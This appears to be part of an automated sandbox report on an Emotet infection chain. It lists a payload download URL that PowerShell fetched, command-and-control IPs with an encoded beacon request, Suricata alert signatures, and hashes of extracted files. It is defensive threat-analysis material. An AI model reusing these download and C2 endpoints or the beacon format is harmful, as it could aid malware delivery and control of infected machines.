Domain | Address | Registrar | Country
---|---|---|---
ifcingenieria.cl | 138.0.120.12 (TTL: 1499) | - | Chile
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Country
---|---|---|---
138.0.120.12 | 80 TCP | powershell.exe (PID: 3800) | Chile
37.120.170.231 | 443 TCP | cosineinit.exe (PID: 3768) | Germany
81.21.67.85 | 8080 TCP | cosineinit.exe (PID: 3768) | United Kingdom
HTTP Traffic
Endpoint | Request | URL | Raw request / Response
---|---|---|---
138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1 Host: ifcingenieria.cl Connection: Keep-Alive 200 OK |
81.21.67.85:8080 | GET | 81.21.67.85/ | GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windo... 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 81.21.67.85:8080 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet CnC Checkin | 2830701 |
138.0.120.12 -> local:61839 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
138.0.120.12 -> local:61839 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
138.0.120.12 -> local:61839 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
Extracted Files
Informative (7)

- 02vPLpWc.LNK
- Size
- 453B (453 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 17 07:53:26 2018, mtime=Thu May 17 07:53:26 2018, atime=Thu May 17 07:53:56 2018, length=167424, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
- 17519994ad3507e805c5160fbef7177e
- SHA1
- 6e58116e050728aef693a7de7721e1b86768c737
- SHA256
- 74e2b8b43e5a59f8982c454d3e0270f9061dbc333062913b454af50411dab922
- ~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
- f66005724ec4875f23c93e180ad80b21
- SHA1
- b7712c7bf45c6a0d1e6ac5262a9761343c482aab
- SHA256
- 09f6fedfba136efd103967316ca3de3e41ae76abafb421a2d93e43b9e52d3988
- TY98LM19OS4MQAMZCOLL.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3800)
- MD5
- 9c77e0a477d4190bd8bcf73a97c939ca
- SHA1
- d616c1115bd1aa171593a71b577f7e66f52c5de8
- SHA256
- b6071f21ddb1a71d1ed78c10cd99868190f201208cf9b3c106e2b4d50185e96f
- index.dat
- Size
- 145B (145 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
- e212257657d986f41591f6e291667807
- SHA1
- 748c05ddec62cea8a3f7cac350ad15c7a9de55f4
- SHA256
- d662f8290ac866a0c1d8eea293715d2cd6f2a6fe19799cf8e39a23a0eeea5bdd
- ~WRS{3B257DFB-1EFD-4832-9438-0BDD960DE59D}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
- 166520.exe
- Size
- 232KiB (237568 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- 166520.exe (PID: 2132)
- MD5
- 60afb4e8d54d4703e5aa0245117f24b8
- SHA1
- e7d75242d84ca9ff5ba124e602799d7501ca7a52
- SHA256
- a8c77ca77f57a21aca5d754f37ba4b053b59e57e3d99b1fd99b7fd4d29a5ff98
- ~$vPLpWc.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
- f66005724ec4875f23c93e180ad80b21
- SHA1
- b7712c7bf45c6a0d1e6ac5262a9761343c482aab
- SHA256
- 09f6fedfba136efd103967316ca3de3e41ae76abafb421a2d93e43b9e52d3988
Notifications

Runtime
- Added comment to Virus Total report
- Extracted file "166520.exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/a8c77ca77f57a21aca5d754f37ba4b053b59e57e3d99b1fd99b7fd4d29a5ff98/analysis/1526544125/")
- Extracted file "~$vPLpWc.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/09f6fedfba136efd103967316ca3de3e41ae76abafb421a2d93e43b9e52d3988/analysis/1526544124/")
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report